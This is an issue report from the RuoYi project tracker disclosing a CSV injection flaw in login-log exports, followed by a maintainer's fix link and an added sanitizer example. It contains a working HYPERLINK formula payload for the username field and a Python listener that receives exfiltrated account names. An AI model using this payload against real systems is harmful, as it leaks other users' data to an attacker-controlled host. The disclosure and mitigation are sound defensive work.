GVP若依 / RuoYi


CSV Injection Vulnerability

Status: Completed
Created 2022-01-18 16:43

The product has a CSV injection vulnerability. In the following example, the CSV injection vulnerability is used to obtain login accounts.

1. When a user logs in, change the value of username in the "/login" request to =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") using the Burp Suite tool.

2. Run the following Python script to start an HTTP service on port 8007.

```python
from http.server import HTTPServer, BaseHTTPRequestHandler
import json

# Body returned to every GET; the interesting part is the request line
# that the server logs, not the response.
data = {'result': 'this is a test'}
# You can change localhost to the IP address of the hacker's computer.
host = ('localhost', 8007)


class Request(BaseHTTPRequestHandler):
    def do_GET(self):
        # BaseHTTPRequestHandler logs each request line (including the
        # query string) to stderr before this handler runs.
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(data).encode())


if __name__ == '__main__':
    server = HTTPServer(host, Request)
    print("Starting server, listening at: %s:%s" % host)
    server.serve_forever()
```

3. Choose "日志管理"->"登录日志" ("Log Management"->"Login Log") to view the logs, and export the .xlsx log file.

4. Open the .xlsx log file and double-click the cell containing =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). Then click an empty cell, and then click the cell containing =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") again. In this case, a request is sent to localhost:8007.
The contents of cells B2 and B3 are admin and test1.
(Screenshot: before double-click.)
(Screenshot: after double-click, and then clicking E.)
(Screenshot: a request is sent to localhost:8007 through the browser.)

5. The HTTP service on port 8007 receives the following information:
127.0.0.1 - - [18/Jan/2022 17:04:07] "GET /?u=admintest1 HTTP/1.1" 200 -

So we get the user "admin"/"test1"/...

Comments (1)


@sanlang Fixed, you can update the code.
Block formulas when exporting Excel, to prevent the CSV injection risk
https://gitee.com/y_project/RuoYi/commit/e9ebf86ac8a53bfc8475c7efad6f63a593eaefa9
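Added example, not part of the issue and not the RuoYi commit above: a small Python sanitizer of the kind that fix describes, which neutralises formula-leading cells before a login log is written to CSV or XLSX. The trigger-character list follows OWASP CSV-injection guidance; the leading-whitespace handling and the helper names are my own assumptions.

```python
import csv
import io

# Characters that make Excel/LibreOffice parse a cell as a formula
# (OWASP CSV-injection guidance: =, +, -, @, tab, carriage return).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """Return True if a spreadsheet client could treat this text as a formula.

    Leading spaces are stripped first as a conservative choice (assumption):
    some clients trim them before deciding whether the cell is a formula.
    """
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def escape_cell(value):
    """Neutralise formula triggers in user-controlled text before export.

    A leading single quote makes the client store the cell as literal text,
    so the value stays inert even if someone later double-clicks the cell
    and leaves it, which is the trigger path described in this issue.
    Non-string values (numbers, dates) are returned unchanged.
    """
    if isinstance(value, str) and is_formula_like(value):
        return "'" + value
    return value


def export_rows_csv(rows):
    """Write rows to CSV text with every cell escaped and fully quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([escape_cell(cell) for cell in row])
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed login-log rows; the username is the payload from this
    # issue, URL-decoded (so %26 is & and %2c is a comma).
    rows = [
        ["username", "ip"],
        ['=HYPERLINK("http://localhost:8007?u="&B2&B3,"E")', "127.0.0.1"],
        ["admin", "127.0.0.1"],
    ]
    print(export_rows_csv(rows))
```

The same escape_cell call belongs in front of every string written by an XLSX exporter too; the single quote is a literal character there, and the client turns it into a text prefix as soon as the cell is edited.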
